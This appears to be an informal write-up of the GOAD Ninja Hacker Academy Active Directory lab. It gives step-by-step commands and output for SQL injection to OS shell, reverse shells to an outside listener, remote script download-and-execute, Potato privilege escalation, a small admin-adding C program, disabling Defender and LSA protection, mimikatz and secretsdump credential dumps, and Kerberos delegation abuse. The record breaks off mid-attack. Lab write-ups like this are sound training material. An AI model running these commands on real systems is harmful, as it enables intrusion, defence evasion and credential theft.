GOAD-NHA

NHA Lab Write-Up

  • This is not a pro write-up. Just me casually sharing my steps. Enjoy!

 

Lab Network Info:

  • WEB → 192.168.56.21 (the web server and entry point)
  • SQL → 192.168.56.22 (SQL Server, reachable via SQLi)
  • SHARE → 192.168.56.23 (a file server)
  • DC-AC → 192.168.56.20 (Domain Controller for academy.ninja.lan)
  • DC-VIL → 192.168.56.10 (Domain Controller for ninja.hack)

The lab has two domains:

• academy.ninja.lan

• ninja.hack

All machines had Defender enabled, and no brute-force was needed.

Starting Point

  • Entry point: WEB (srv-1)→ 192.168.56.21
  • Found a web page showing a student list.
  • The URL had a vulnerable parameter:

http://192.168.56.21/Students?SearchString=test&orderBy=Team

  • The orderBy parameter was vulnerable to SQL injection.
sqlmap -u 'http://192.168.56.21/Students?SearchString=444&orderBy=Team' --batch --level=3 --risk=2 --ignore-code=401 --tamper=between,randomcase --os-shell

SQLMap confirmed it’s MSSQL, and the user is:

nt authority\network service

But the real surprise?

The SQL commands were executing on another machine → SQL at 192.168.56.22

Shell on SQL & PrivEsc

I launched a reverse shell using nc.exe, bypassed AMSI, and found that I had:

using amsi.fail

whoami /priv

SeImpersonatePrivilege Impersonate a client after authentication Enabled

That’s all I needed

Used BadPotato to impersonate SYSTEM and executed adduser.exe to:


iex ([System.Text.Encoding]::ASCII.GetString((iwr “http://192.168.56.1/Invoke-BadPotato.ps1" -UseBasicParsing).Content))
Invoke-BadPotato -command “C:\users\public\adduser.exe”
  • Create a user: puck
  • Add him to the Administrators group

You need to compile it to exe

$ apt install mingw-w64
$ x86_64-w64-mingw32-g++ adduser.c -o adduser.exe
                                                                                                                                                                                                                                           
$ file adduser.exe  
adduser.exe: PE32+ executable for MS Windows 5.02 (console), x86-64, 18 sections
                                                                                                                                                                                                                                           
$ cat adduser.c      
#include <stdlib.h>
int main () {
int i;
i = system ("net user puck Password123@ /add");
i = system ("net localgroup administrators puck /add");
return 0;
}
                                                                                                                                                                                                                                           

.

Creating a C File in Visual Studio
To create and work with a C file in Visual Studio, follow these steps:

Example

Open Visual Studio.
Go to File > New > Project or press Ctrl + Shift + N.
Select C++ from the project templates and choose Console App.
Name your project and click Create.
In the Solution Explorer, delete the default .cpp file (if present).
Right-click on the Source Files folder, select Add > New Item, and choose C++ File (.cpp).
Rename the file with a .c extension (e.g., adduser.c) to indicate it's a C file.
Write your C code in the newly created file.

#include <stdlib.h>
int main () {
int i;
i = system ("net user puck Password123@ /add");
i = system ("net localgroup administrators puck /add");
return 0;
}

 

.


 

Now I fully owned SQL.

I disabled Defender for easier post-exploitation, grabbed two flags, and moved on

Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Lsa” /v “RunAsPPL” /t REG_DWORD /d 0 /f

—————-


other interesting finding on sql server

 

PS C:\setup\mssql> cat sql_conf.ini
cat sql_conf.ini
;SQL Server Configuration File
<snip>
SQLSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
SAPWD="sa_P@ssw0rd!N1nJ4hackaDemy"

verify creds

proxychains nxc mssql 192.168.56.22 -u sa -p 'sa_P@ssw0rd!N1nJ4hackaDemy' --local-auth -x 'type c:\flag.txt'  

$ proxychains nxc mssql 192.168.56.22 -u sa -p 'sa_P@ssw0rd!N1nJ4hackaDemy' --local-auth

MSSQL       192.168.56.22   1433   SQL              [*] Windows 10 / Server 2019 Build 17763 (2019 RTM 15.0.2000) (name:SQL) (domain:academy.ninja.lan) (EncryptionReq:False) 
MSSQL       192.168.56.22   1433   SQL              [+] SQL\sa:sa_P@ssw0rd!N1nJ4hackaDemy (Pwn3d!)

other nice

proxychains nxc mssql 192.168.56.22 -u sa -p 'sa_P@ssw0rd!N1nJ4hackaDemy' --local-auth -x 'c:\\programdata\\rcat_178.224.123.45_8888.exe'

.

$ rlwrap nc -nlvp 8888                              
listening on [any] 8888 ...
connect to [192.168.1.41] from (UNKNOWN) [64.23.111.54] 55422
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\network service
PS C:\Windows\system32> hostname
hostname
sql

.

using printspoofer64.exe to escalate from nt authority\network service to nt authority\system

.\printspoofer64.exe -c c:\programdata\rcat_178.224.123.45_8888.exe

PS C:\programdata> hostname
hostname
sql
PS C:\programdata> whoami
whoami
nt authority\network service

PS C:\programdata> .\printspoofer64.exe -c c:\programdata\rcat_178.224.123.45_8888.exe
.\printspoofer64.exe -c c:\programdata\rcat_178.224.123.45_8888.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
PS C:\programdata>

.

$ rlwrap nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.1.41] from (UNKNOWN) [64.23.111.54] 61180
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system

.

from session as nt-authority\system on sql

[127.0.0.1] sliver (SECONDARY_FEDORA) > execute -o whoami /groups
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
                                                

[127.0.0.1] sliver (SECONDARY_FEDORA) > mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords"

[*] Successfully executed mimikatz
[*] Got output:

  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2024 22:19:06
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

588	{0;000003e7} 1 D 18978     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 77800641  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,31p)	Primary
 * Thread Token  : {0;000003e7} 1 D 77993466  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 44422 (00000000:0000ad86)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 8/21/2026 6:14:00 AM
SID               : S-1-5-90-0-1
    msv :	
     [00000003] Primary
     * Username : SQL$
     * Domain   : ACADEMY
     * NTLM     : d7fa6321234fdc8f64ece061cf866570
     * SHA1     : 44bfe57cec56d0253bcf1367cb22b050e09fd151
     * DPAPI    : 44bfe57cec56d0253bcf1367cb22b050
    tspkg :	
    wdigest :	
     * Username : SQL$
     * Domain   : ACADEMY
     * Password : (null)
    kerberos :	
     * Username : SQL$
     * Domain   : academy.ninja.lan
     * Password : F1<PmZ8X*9^pYPx\\na=?hvR3KY.cQ=tRB,=f>8Bln!Ve=Bos\);b%=;KAauSj G'9ro.&:,eQH?32 gVgTD:YRpwgswfYr]F=E[4$1@hS`e`,=1D1FpI=KP
    ssp :	
    credman :	

<snip>

[127.0.0.1] sliver (SECONDARY_FEDORA) > SOCKS5 start

.

$ proxychains impacket-getTGT 'academy.ninja.lan/sql\$' -hashes :d7fa6321234fdc8f64ece061cf866570 

[*] Saving ticket in sql\$.ccache

proxychains bloodhound-ce-python --zip -c All -k -no-pass -u 'sql$' -d academy.ninja.lan -ns 192.168.56.20

.


 

BloodHound = Goldmine

sudo docker-compose -f /opt/bloodhoundce/docker-compose.yml up

I dumped using SharpHound and uploaded BloodHound data and found something interesting:

c:\ProgramData>PsExec64.exe -s -i powershell.exe

PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com

in new window

PS C:\programdata> .\SharpHound.exe
2026-08-18T06:04:31.1717758-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2026-08-18T06:04:31.5753027-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2026-08-18T06:04:31.6425470-07:00|INFORMATION|Initializing SharpHound at 6:04 AM on 8/18/2026
2026-08-18T06:04:32.2468801-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for academy.ninja.lan : dc-ac.academy.ninja.lan
2026-08-18T06:04:32.3566566-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2026-08-18T06:04:32.9365569-07:00|INFORMATION|Beginning LDAP search for academy.ninja.lan
2026-08-18T06:04:33.0746427-07:00|INFORMATION|Producer has finished, closing LDAP channel
2026-08-18T06:04:33.0746427-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2026-08-18T06:05:03.0149871-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2026-08-18T06:05:18.0141819-07:00|INFORMATION|Consumers finished, closing output channel
2026-08-18T06:05:18.1547467-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2026-08-18T06:05:18.5924516-07:00|INFORMATION|Status: 126 objects finished (+126 2.8)/s -- Using 43 MB RAM
2026-08-18T06:05:18.5924516-07:00|INFORMATION|Enumeration finished in 00:00:45.6834456
2026-08-18T06:05:18.8268961-07:00|INFORMATION|Saving cache with stats: 85 ID to type mappings.
 88 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 1 global catalog mappings.
2026-08-18T06:05:18.8596152-07:00|INFORMATION|SharpHound Enumeration Completed at 6:05 AM on 8/18/2026! Happy Graphing!
PS C:\programdata>

.

SQL has GenericAll rights on the Computers container

Steps:

  1. Dumped NTLM hash of $sql using mimikatz
iex (iwr http://192.168.56.1/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SQL$
Domain            : ACADEMY
Logon Server      : (null)
Logon Time        : 8/18/2026 1:22:24 AM
SID               : S-1-5-18

         * Username : sql$
         * Domain   : ACADEMY.NINJA.LAN
         * Password : (null)
         * Key List :
           aes256_hmac       bf13e5519bf0f4640c12ad6c4dc2a0977ddf4c72d39df1f7f84b8e97f4d43b9f
           rc4_hmac_nt       d7fa6321234fdc8f64ece061cf866570
           rc4_hmac_old      d7fa6321234fdc8f64ece061cf866570
           rc4_md4           d7fa6321234fdc8f64ece061cf866570
           rc4_hmac_nt_exp   d7fa6321234fdc8f64ece061cf866570
           rc4_hmac_old_exp  d7fa6321234fdc8f64ece061cf866570

.

2. Used addcomputer.py to create a new computer

impacket-addcomputer academy.ninja.lan/sql$ -hashes :d7fa6321234fdc8f64ece061cf866570 -computer-name attackerPC$ -computer-pass 'P@ssw0rd123!'

$ impacket-addcomputer academy.ninja.lan/sql$ -hashes :d7fa6321234fdc8f64ece061cf866570 -computer-name attackerPC$ -computer-pass 'P@ssw0rd123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account attackerPC$ with password P@ssw0rd123!.

.

3. Used dacledit.py to give full control to my new computer

impacket-dacledit -action write -rights FullControl -inheritance -principal attackerPC$\
 -target-dn "CN=Computers,DC=academy,DC=ninja,DC=lan" -hashes :d7fa6321234fdc8f64ece061cf866570 academy.ninja.lan/SQL$'
$ impacket-dacledit -action write -rights FullControl -inheritance -principal attackerPC$ -target-dn "CN=Computers,DC=academy,DC=ninja,DC=lan" -hashes :d7fa6321234fdc8f64ece061cf866570 academy.ninja.lan/SQL$
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20260818-151710.bak
[*] DACL modified successfully!

 

extra Used dacledit.py to give full control to SQL$

proxychains impacket-dacledit -action write -rights FullControl -inheritance -principal SQL$ -target-dn "CN=Computers,DC=academy,DC=ninja,DC=lan" -hashes :d7fa6321234fdc8f64ece061cf866570 academy.ninja.lan/SQL$P

.

proxychains impacket-dacledit -action “write” -principal SQL$ -target-dn “CN=Computers,DC=academy,DC=ninja,DC=lan” “academy.ninja.lan”/”SQL$” -hashes :d7fa6321234fdc8f64ece061cf866570 -inheritance -dc-ip 192.168.56.20

$ proxychains impacket-dacledit -action "write" -principal SQL$ -target-dn "CN=Computers,DC=academy,DC=ninja,DC=lan" "academy.ninja.lan"/"SQL$" -hashes :d7fa6321234fdc8f64ece061cf866570 -inheritance -dc-ip 192.168.56.20 

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
/usr/share/doc/python3-impacket/examples/dacledit.py:390: DeprecationWarning: codecs.open() is deprecated. Use open() instead.
  with codecs.open(self.filename, 'w', 'utf-8') as outfile:
[*] DACL backed up to dacledit-20260828-202829.bak
[*] DACL modified successfully!

 

.

result

attacker machine ( and  sql.academy.ninja.lan ) have genericall on web now

4. adding other computer

impacket-addcomputer -method SAMR -computer-name PUCKPC$ -computer-pass P@ssw0rd123! -dc-host 192.168.56.20 -domain-netbios ACADEMY ACADEMY/attackerPC$:P@ssw0rd123!

$ impacket-addcomputer -method SAMR -computer-name PUCKPC$ -computer-pass P@ssw0rd123! -dc-host 192.168.56.20 -domain-netbios ACADEMY ACADEMY/attackerPC$:P@ssw0rd123!
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account PUCKPC$ with password P@ssw0rd123!.

.

5. Abused RBCD to target WEB

impacket-rbcd -delegate-from 'PUCKPC$' -delegate-to 'WEB$' -action 'write' 'ACADEMY.NINJA.LAN/attackerPC$:P@ssw0rd123!'

$ impacket-rbcd -delegate-from 'PUCKPC$' -delegate-to 'WEB$' -action 'write' 'ACADEMY.NINJA.LAN/attackerPC$:P@ssw0rd123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] PUCKPC$ can now impersonate users on WEB$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     PUCKPC$      (S-1-5-21-1689894000-2828720023-2655755433-1138)

.

6. Get a TGT, then then a service ticket to impersonate administrator

impacket-getTGT -aesKey 'bf13e5519bf0f4640c12ad6c4dc2a0977ddf4c72d39df1f7f84b8e97f4d43b9f' 'ACADEMY.NINJA.LAN/SQL$' -dc-ip 192.168.56.20
$ impacket-getTGT -aesKey 'bf13e5519bf0f4640c12ad6c4dc2a0977ddf4c72d39df1f7f84b8e97f4d43b9f'  'ACADEMY.NINJA.LAN/SQL$' -dc-ip 192.168.56.20
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in SQL$.ccache
-> wrong

use

$ impacket-getTGT 'ACADEMY.NINJA.LAN/PUCKPC$:P@ssw0rd123!' -dc-ip 192.168.56.20
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in PUCKPC$.ccache

$ export KRB5CCNAME=PUCKPC\$.ccache

$ klist
Ticket cache: FILE:PUCKPC$.ccache
Default principal: PUCKPC$@ACADEMY.NINJA.LAN

Valid starting       Expires              Service principal
08/18/2026 15:36:30  08/19/2026 01:36:30  krbtgt/ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN
        renew until 08/19/2026 15:36:30

$ impacket-getST -spn cifs/WEB.ACADEMY.NINJA.LAN -impersonate administrator 'ACADEMY.NINJA.LAN/PUCKPC$:P@ssw0rd123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_WEB.ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN.ccache

....

 

 

7. Used impacket-secretsdump to dump everything from WEB

export KRB5CCNAME=administrator@cifs_WEB.ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN.ccache impacket-secretsdump -no-pass -k administrator@WEB.ACADEMY.NINJA.LAN
$ klist
Ticket cache: FILE:administrator@cifs_WEB.ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN.ccache
Default principal: administrator@ACADEMY.NINJA.LAN

Valid starting       Expires              Service principal
08/18/2026 15:37:12  08/19/2026 01:36:30  cifs/WEB.ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN
        renew until 08/19/2026 15:36:30


impacket-secretsdump -no-pass -k administrator@WEB.ACADEMY.NINJA.LAN
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3f6fe96ab321aca0000d59ed0dfd4bcc
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0c532fcf2046010cb8d38eedf5e45312:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6d587fe93bb333e51b07759bc056d261:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
ACADEMY\WEB$:plain_password_hex:79004a006700690078007900220063004400570060003b0025003d00470067007a005b002b004e005c002d005700780050002800550031006b00250048002f0050005f005c004b004200280078006800760060005c004c0074002b006500220068006c002600770030006600280047002e00720069004300620061005f007100580075003b002600290042006f004d003900210043005f004f004b002a0058003c004e00690063003200770043005c002a003400340021004a007400720065002a002b00630022005d0070002b00650061003400480063003e00310021006d006e002d002d006b005400200058005900
ACADEMY\WEB$:aad3b435b51404eeaad3b435b51404ee:9c64f8b96c129d62f67cf7cd6bdf88d0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x30f91d49da6d7bcd822a8ef5b6a69377df9e3d7e
dpapi_userkey:0x22d66027e0828bdd2822a23fa1506dce814516e1
[*] NL$KM
 0000   6A 2F A7 33 55 6E B4 2D  26 EA 27 3B 9B C0 A2 5C   j/.3Un.-&.';...\
 0010   D6 5C CC CC 8C 6A 7B 82  D1 83 BC 0B 4F 1A 89 42   .\...j{.....O..B
 0020   66 4F 98 75 84 97 FF AE  F4 C4 7A 60 0D 6A 41 DA   fO.u......z`.jA.
 0030   75 B3 F0 BD 65 28 BD 52  06 8C 06 AA DB BB A1 9A   u...e(.R........
NL$KM:6a2fa733556eb42d26ea273b9bc0a25cd65ccccc8c6a7b82d183bc0b4f1a8942664f98758497ffaef4c47a600d6a41da75b3f0bd6528bd52068c06aadbbba19a
[*] Cleaning up...
[*] Stopping service RemoteRegistry

.

verify found creds

nxc smb 192.168.56.21 -u '.\administrator' -H 'aad3b435b51404eeaad3b435b51404ee:0c532fcf2046010cb8d38eedf5e45312'

$ nxc smb 192.168.56.21 -u '.\administrator' -H 'aad3b435b51404eeaad3b435b51404ee:0c532fcf2046010cb8d38eedf5e45312'
SMB         192.168.56.21   445    WEB              [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB) (domain:academy.ninja.lan) (signing:False) (SMBv1:None)
SMB         192.168.56.21   445    WEB              [+] .\administrator:0c532fcf2046010cb8d38eedf5e45312 (Pwn3d!)

.

evil-winrm -i WEB.ACADEMY.NINJA.LAN -u Administrator -H '0c532fcf2046010cb8d38eedf5e45312'

iex (iwr http://192.168.56.1/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'

Good 2 only download iwr -Uri "http://url/script.ps1" -OutFile "bestandsnaam.ps1"

iex (iwr http://192.168.56.1/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'

files on disk suggest we are running in a sandbox. Caution!.
C:\windows\System32\Drivers\VBoxMouse.sys
C:\windows\System32\Drivers\VBoxGuest.sys
C:\windows\System32\Drivers\VBoxSF.sys
C:\windows\System32\vboxhook.dll
C:\windows\System32\vboxmrxnp.dll
C:\windows\System32\vboxservice.exe
C:\windows\System32\vboxtray.exe
C:\windows\System32\VBoxControl.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 23 2024 17:47:47
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 92728976 (00000000:0586ee90)
Session           : NetworkCleartext from 0
User Name         : frank
Domain            : ACADEMY
Logon Server      : DC-AC
Logon Time        : 8/18/2026 7:09:55 AM
SID               : S-1-5-21-1689894000-2828720023-2655755433-1132

         * Username : frank
         * Domain   : ACADEMY.NINJA.LAN
         * Password : (null)
         * Key List :
           aes256_hmac       a0d676dd3e4d7673ec255caf010e1e350f1b09d8871b88eb01c4c8ba4217beac
           rc4_hmac_nt       d4fad93561dee253398d5891e991a6fb
           rc4_hmac_old      d4fad93561dee253398d5891e991a6fb
           rc4_md4           d4fad93561dee253398d5891e991a6fb
           rc4_hmac_nt_exp   d4fad93561dee253398d5891e991a6fb
           rc4_hmac_old_exp  d4fad93561dee253398d5891e991a6fb

<snip>

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEB$
Domain            : ACADEMY
Logon Server      : (null)
Logon Time        : 8/14/2026 5:35:06 PM
SID               : S-1-5-18

         * Username : web$
         * Domain   : ACADEMY.NINJA.LAN
         * Password : (null)
         * Key List :
           aes256_hmac       9b24d3628174c8eb291229e0b6e14b03754235902a3d969447251ae2794ee4e7
           rc4_hmac_nt       9c64f8b96c129d62f67cf7cd6bdf88d0
           rc4_hmac_old      9c64f8b96c129d62f67cf7cd6bdf88d0
           rc4_md4           9c64f8b96c129d62f67cf7cd6bdf88d0
           rc4_hmac_nt_exp   9c64f8b96c129d62f67cf7cd6bdf88d0
           rc4_hmac_old_exp  9c64f8b96c129d62f67cf7cd6bdf88d0
....

.

verify creds

proxychains nxc smb 192.168.56.21 -u frank -H 'd4fad93561dee253398d5891e991a6fb'

$ proxychains nxc smb 192.168.56.21 -u frank -H 'd4fad93561dee253398d5891e991a6fb'      

SMB         192.168.56.21   445    WEB              [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB) (domain:academy.ninja.lan) (signing:False) (SMBv1:False)
SMB         192.168.56.21   445    WEB              [+] academy.ninja.lan\frank:d4fad93561dee253398d5891e991a6fb (Pwn3d!)

.

$ proxychains -q evil-winrm -i SQL.ACADEMY.NINJA.LAN -u frank -H 'd4fad93561dee253398d5891e991a6fb'
                                        
Evil-WinRM shell v3.9
                                       
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\frank\Documents> whoami
academy\frank

.

.


just for fun

$ proxychains impacket-getTGT 'academy.ninja.lan/frank' -hashes :d4fad93561dee253398d5891e991a6fb 

[*] Saving ticket in frank.ccache
                                                                                                                     
export KRB5CCNAME=frank.ccache              
                                                                                                                     

 

-----

all abuse got it from bloodhound

then turn off defender

Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true

reg add “HKLM\SYSTEM\CurrentControlSet\Control\Lsa” /v “RunAsPPL” /t REG_DWORD /d 0 /f

and dump Lsass using netexec

netexec smb 192.168.56.21 -u administrator -H '0c532fcf2046010cb8d38eedf5e45312' —local-auth -M lsassy

got frank hashes !

ACADEMY\frank d4fad93561dee253398d5891e991a6fb

Flag captured

.

┌──(bolke㉿hacky)-[~/htb/goad-nha]
└─$ proxychains -q evil-winrm -i web.ACADEMY.NINJA.LAN -u frank -H 'd4fad93561dee253398d5891e991a6fb'
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\frank\Documents> cd c:\programdata

*Evil-WinRM* PS C:\programdata> . .\invoke-mimi.ps1
*Evil-WinRM* PS C:\programdata> Invoke-Mimi -Command '"sekurlsa::ekeys"'
The following files on disk suggest we are running in a sandbox. Caution!.
C:\windows\System32\Drivers\VBoxMouse.sys
C:\windows\System32\Drivers\VBoxGuest.sys
C:\windows\System32\Drivers\VBoxSF.sys
C:\windows\System32\vboxhook.dll
C:\windows\System32\vboxmrxnp.dll
C:\windows\System32\vboxservice.exe
C:\windows\System32\vboxtray.exe
C:\windows\System32\VBoxControl.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 23 2024 17:47:47
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 2373378 (00000000:00243702)
Session           : NetworkCleartext from 0
User Name         : frank
Domain            : ACADEMY
Logon Server      : DC-AC
Logon Time        : 8/21/2026 7:46:55 AM
SID               : S-1-5-21-1689894000-2828720023-2655755433-1132

     * Username : frank
     * Domain   : ACADEMY.NINJA.LAN
     * Password : (null)
     * Key List :
       aes256_hmac       a0d676dd3e4d7673ec255caf010e1e350f1b09d8871b88eb01c4c8ba4217beac
       rc4_hmac_nt       d4fad93561dee253398d5891e991a6fb

<snip>


Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEB$
Domain            : ACADEMY
Logon Server      : (null)
Logon Time        : 8/21/2026 6:15:58 AM
SID               : S-1-5-20

     * Username : web$
     * Domain   : ACADEMY.NINJA.LAN
     * Password : (null)
     * Key List :
       aes256_hmac       9b24d3628174c8eb291229e0b6e14b03754235902a3d969447251ae2794ee4e7
       rc4_hmac_nt       9c64f8b96c129d62f67cf7cd6bdf88d0



<snip>
*Evil-WinRM* PS C:\programdata> 

 

.

Moving to SHARE

From BloodHound again:
frank@academy.ninja.lan has constrained delegation rights on SHARE.

.

$ impacket-findDelegation -dc-ip 'dc-ac.academy.ninja.lan' "academy.ninja.lan"/"frank" -hashes :d4fad93561dee253398d5891e991a6fb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

AccountName  AccountType  DelegationType                      DelegationRightsTo                SPN Exists
-----------  -----------  ----------------------------------  --------------------------------  ----------
DC-AC$       Computer     Unconstrained                       N/A                               Yes
PUCKPC$      Computer     Resource-Based Constrained          WEB$                              No
frank        Person       Constrained w/ Protocol Transition  eventlog/share                    No
frank        Person       Constrained w/ Protocol Transition  eventlog/share.academy.ninja.lan  Yes

.

This is interesting just like the GenericAll on the container, I have not yet this specific Constrained Delegation with Protocol Transition on the eventlog/share. However this works basically the same as any Constrained Delegation we can leverage the msdsspn value; which in this case is the eventlog/share and specify a altservice service. So let’s try to create a ticket but this time with CIFS as altservice.

it should work like below, but not for me 🙁

link : https://crypt0ace.github.io/posts/NHA-Part-3/

link2  minute28 : 7MS #697: Pwning Ninja Hacker Academy – Part 4 – YouTube   

 

┌──(bolke㉿kali)-[~/goad-nha]
└─$ impacket-getST -spn 'eventlog/share.academy.ninja.lan' -altservice 'çifs/share' -impersonate Administrator -dc-ip 'dc-ac.academy.ninja.lan' "academy.ninja.lan"/"frank" -hashes :d4fad93561dee253398d5891e991a6fb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[-] Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)

.

This error typically occurs during Kerberos delegation attacks (like S4U2self/S4U2proxy using Impacket) when the Domain Controller (KDC) blocks or does not support the encryption type requested by your tool.
In modern Windows Server environments (especially after recent hardening updates like CVE-2022-37967), RC4 (NTLM hashes) is often disabled or restricted for Kerberos tickets, requiring AES128 or AES256 instead.
Here is how to resolve the issue based on the most common causes:
1. Switch from NTLM Hashes to AES Keys
If you are passing an NTLM hash (-hashes :<NTLM_HASH>), the tool defaults to requesting an RC4 ticket. If the KDC has RC4 disabled, it throws KDC_ERR_ETYPE_NOSUPP.
  • Solution: Extract the AES256 key for the account instead of the NTLM hash, and use the -aesKey flag in Impacket.
  • Command Example:
    python3 getST.py -aesKey <AES_256_KEY> -impersonate Administrator -spn HTTP/target.domain.local domain.local/user
    
    .

┌──(bolke㉿kali)-[~/htb/goad-nha]
└─$ impacket-getST -spn 'eventlog/share' -altservice 'cifs' -impersonate 'Administrator' -aesKey a0d676dd3e4d7673ec255caf010e1e350f1b09d8871b88eb01c4c8ba4217beac 'academy.ninja.lan/frank'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
[*] Impersonating Administrator
